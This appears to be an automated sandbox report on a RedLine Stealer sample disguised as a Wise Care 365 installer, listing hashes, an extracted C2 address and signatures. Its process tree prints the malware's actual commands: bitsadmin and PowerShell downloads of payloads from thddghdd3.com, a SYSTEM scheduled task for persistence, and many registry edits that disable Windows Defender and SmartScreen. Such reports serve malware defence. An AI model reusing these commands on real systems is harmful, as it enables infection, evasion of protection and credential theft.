Analysis
max time kernel: 151s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 09-06-2022 20:12

Static task: static1
Behavioral task: behavioral1
Sample: aad0024d7c30bf6fee7c90d90371ca14.exe
Resource: win7-20220414-en

General
Target: aad0024d7c30bf6fee7c90d90371ca14.exe
Size: 37.0MB
MD5: aad0024d7c30bf6fee7c90d90371ca14
SHA1: a503d2586a3eab062b1696fc1602bae9faaeb221
SHA256: 69a22a0c352f37433ae833dcffed41e1b6d6c5aeefe6167aa4e0be3fe2f07e07
SHA512: b8aa5a82c7b3366bc93dee6bfffbb6d5e6fefeff12d8073f8a86993e0a4c985fd88dd33ef87b89384cd094dc34444fc505bfcb3b90cc647bd01088692c3f970a

Malware Config
Extracted: http://thddghdd3.com/hfile.bin
Extracted: redline
  Main: 185.250.148.104:23290
  auth_value: 128a196090d81c16477a2ef82c42859f

Signatures
Processes (process: description, ioc):
  reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"
  reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"
  reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection
  reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"
  reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection
  reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection
  reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection
Processes (process: description, ioc):
  reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications
  reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications
Modifies security service 2 TTPs 4 IoCs
Processes (process: description, ioc):
  reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"
  reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"
  reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"
  reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload 1 IoCs
Processes (resource, yara_rule):
  behavioral2/memory/4976-319-0x0000000000B80000-0x0000000000BA0000-memory.dmp: family_redline
Suspicious use of NtCreateUserProcessOtherParentProcess 32 IoCs
Processes (description, pid, process, target process):
  PID 4176 (svchost.exe) created 2608 (kernel32.exe)
  PID 4176 (svchost.exe) created 4568 (kernel32.exe)
  PID 4176 (svchost.exe) created 832 (kernel32.exe)
  PID 4176 (svchost.exe) created 3496 (kernel32.exe)
  PID 4176 (svchost.exe) created 3652 (kernel32.exe)
  PID 4176 (svchost.exe) created 1256 (kernel32.exe)
  PID 4176 (svchost.exe) created 5112 (kernel32.exe)
  PID 4176 (svchost.exe) created 1312 (kernel32.exe)
  PID 4176 (svchost.exe) created 4740 (kernel32.exe)
  PID 4176 (svchost.exe) created 5020 (DllHost.exe)
  PID 4176 (svchost.exe) created 4480 (kernel32.exe)
  PID 4176 (svchost.exe) created 3476 (kernel32.exe)
  PID 4176 (svchost.exe) created 3604 (kernel32.exe)
  PID 4176 (svchost.exe) created 2044 (kernel32.exe)
  PID 4176 (svchost.exe) created 2088 (kernel32.exe)
  PID 4176 (svchost.exe) created 3372 (kernel32.exe)
  PID 4176 (svchost.exe) created 4704 (kernel32.exe)
  PID 4176 (svchost.exe) created 4572 (kernel32.exe)
  PID 4176 (svchost.exe) created 832 (kernel32.exe)
  PID 4176 (svchost.exe) created 4160 (kernel32.exe)
  PID 4176 (svchost.exe) created 1144 (kernel32.exe)
  PID 4176 (svchost.exe) created 892 (kernel32.exe)
  PID 4176 (svchost.exe) created 3980 (kernel32.exe)
  PID 4176 (svchost.exe) created 3096 (kernel32.exe)
  PID 4176 (svchost.exe) created 2628 (kernel32.exe)
  PID 4176 (svchost.exe) created 2564 (kernel32.exe)
  PID 4176 (svchost.exe) created 228 (kernel32.exe)
  PID 4176 (svchost.exe) created 2620 (kernel32.exe)
  PID 4176 (svchost.exe) created 2036 (kernel32.exe)
  PID 4176 (svchost.exe) created 1708 (kernel32.exe)
  PID 4176 (svchost.exe) created 4348 (kernel32.exe)
  PID 4176 (svchost.exe) created 3196 (kernel32.exe)
Blocklisted process makes network request 1 IoCs
Processes (flow, pid, process):
  flow 16: PID 3772 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 64 IoCs
Processes (resource, yara_rule):
  behavioral2/memory/2236-331-0x0000000000BE0000-0x0000000000D35000-memory.dmp: upx
  behavioral2/memory/2236-334-0x0000000000BE0000-0x0000000000D35000-memory.dmp: upx
  behavioral2/memory/2236-336-0x0000000000BE0000-0x0000000000D35000-memory.dmp: upx
  behavioral2/memory/1888-337-0x0000000000BE0000-0x0000000000D35000-memory.dmp: upx
  behavioral2/memory/4368-338-0x0000000000BE0000-0x0000000000D35000-memory.dmp: upx
  behavioral2/memory/1888-339-0x0000000000BE0000-0x0000000000D35000-memory.dmp: upx
  behavioral2/memory/4368-340-0x0000000000BE0000-0x0000000000D35000-memory.dmp: upx
  behavioral2/memory/1888-341-0x0000000000BE0000-0x0000000000D35000-memory.dmp: upx
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes (process: description, ioc):
  cmd.exe: Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation
  WScript.exe: Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation
  nvdrivesllapi.exe: Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation
  aad0024d7c30bf6fee7c90d90371ca14.tmp: Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation
Loads dropped DLL 5 IoCs
Processes (pid, process):
  PID 2944 aad0024d7c30bf6fee7c90d90371ca14.tmp
  PID 4780 Wise Care 365 5.9.1.582.tmp
  PID 4780 Wise Care 365 5.9.1.582.tmp
  PID 4780 Wise Care 365 5.9.1.582.tmp
  PID 4780 Wise Care 365 5.9.1.582.tmp
Modifies file permissions 1 TTPs 3 IoCs
Processes (pid, process):
  PID 2620 icacls.exe
  PID 2332 icacls.exe
  PID 3240 icacls.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
AutoIT Executable 8 IoCs
AutoIT scripts compiled to PE executables.
Processes (resource, yara_rule):
  behavioral2/memory/2236-331-0x0000000000BE0000-0x0000000000D35000-memory.dmp: autoit_exe
  behavioral2/memory/2236-334-0x0000000000BE0000-0x0000000000D35000-memory.dmp: autoit_exe
  behavioral2/memory/2236-336-0x0000000000BE0000-0x0000000000D35000-memory.dmp: autoit_exe
  behavioral2/memory/1888-337-0x0000000000BE0000-0x0000000000D35000-memory.dmp: autoit_exe
  behavioral2/memory/4368-338-0x0000000000BE0000-0x0000000000D35000-memory.dmp: autoit_exe
  behavioral2/memory/1888-339-0x0000000000BE0000-0x0000000000D35000-memory.dmp: autoit_exe
  behavioral2/memory/4368-340-0x0000000000BE0000-0x0000000000D35000-memory.dmp: autoit_exe
  behavioral2/memory/1888-341-0x0000000000BE0000-0x0000000000D35000-memory.dmp: autoit_exe
Suspicious use of SetThreadContext 1 IoCs
Processes (description, pid, process, target process):
  PID 3980 (ielowutil.exe) set thread context of 4976 (csc.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Delays execution with timeout.exe 3 IoCs
Processes (pid, process):
  PID 1896 timeout.exe
  PID 3036 timeout.exe
  PID 456 timeout.exe
Download via BitsAdmin 1 TTPs 2 IoCs
Enumerates system info in registry 2 TTPs 2 IoCs
Processes (process: description, ioc):
  xcopy.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
  xcopy.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 2 IoCs
Processes (process: description, ioc):
  explorer.exe: Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings
  cmd.exe: Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings
Runs ping.exe 1 TTPs 64 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 1 IoCs
Processes (pid, process):
  PID 2944 aad0024d7c30bf6fee7c90d90371ca14.tmp
Suspicious use of SetWindowsHookEx 3 IoCs
Processes (pid, process):
  PID 4780 Wise Care 365 5.9.1.582.tmp
  PID 4780 Wise Care 365 5.9.1.582.tmp
  PID 4780 Wise Care 365 5.9.1.582.tmp
Suspicious use of WriteProcessMemory 64 IoCs
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
(process-tree depth in brackets; each entry gives the image path, then the recorded command line; matched signatures are listed beneath the entry)
[1] C:\Users\Admin\AppData\Local\Temp\aad0024d7c30bf6fee7c90d90371ca14.exe | "C:\Users\Admin\AppData\Local\Temp\aad0024d7c30bf6fee7c90d90371ca14.exe"
    - Suspicious use of WriteProcessMemory
[2] C:\Users\Admin\AppData\Local\Temp\is-BKVH8.tmp\aad0024d7c30bf6fee7c90d90371ca14.tmp | "C:\Users\Admin\AppData\Local\Temp\is-BKVH8.tmp\aad0024d7c30bf6fee7c90d90371ca14.tmp" /SL5="$9003A,38098121,731648,C:\Users\Admin\AppData\Local\Temp\aad0024d7c30bf6fee7c90d90371ca14.exe"
    - Executes dropped EXE
    - Checks computer location settings
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
[3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
    - Suspicious use of WriteProcessMemory
[4] C:\Windows\SysWOW64\bitsadmin.exe | bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml
    - Download via BitsAdmin
[4] C:\Windows\SysWOW64\bitsadmin.exe | bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/wlanext32.exe C:\Users\Admin\AppData\Local\Temp\wlanext32.exe
    - Download via BitsAdmin
[4] C:\Windows\SysWOW64\xcopy.exe | xcopy /y "C:\Users\Admin\AppData\Local\Temp\wlanext32.exe" "C:\ProgramData\Local\Microsoft\Windows\Telemetry\"
    - Enumerates system info in registry
[4] C:\Windows\SysWOW64\xcopy.exe | xcopy /y "C:\Users\Admin\AppData\Local\Temp\Telemetry.xml" "C:\ProgramData\Local\Microsoft\Windows\Telemetry\"
    - Enumerates system info in registry
[4] C:\Windows\SysWOW64\attrib.exe | ATTRIB +H C:\ProgramData\Local\Microsoft\Windows\Telemetry\*.*
    - Views/modifies file attributes
[4] C:\Windows\SysWOW64\schtasks.exe | schtasks.exe /create /RU SYSTEM /TN "Telemetry update-S-1-5-21-3460174932" /XML "C:\ProgramData\Local\Microsoft\Windows\Telemetry\Telemetry.xml"
    - Creates scheduled task(s)
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 3 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 1 127.0.0.1
    - Runs ping.exe
[4] C:\Windows\SysWOW64\PING.EXE | Ping -n 3 127.0.0.1
[3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
[4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[4] C:\ProgramData\ConsoleApp\7za.exe | 7za.exe x -y -p1r7d2kvUf3 "*.7z"
    - Executes dropped EXE
[4] C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\ProgramData\ConsoleApp\ControlSet003.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
[5] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet001.bat" "
    - Suspicious use of WriteProcessMemory
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
[7] C:\Windows\System32\reg.exe | "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
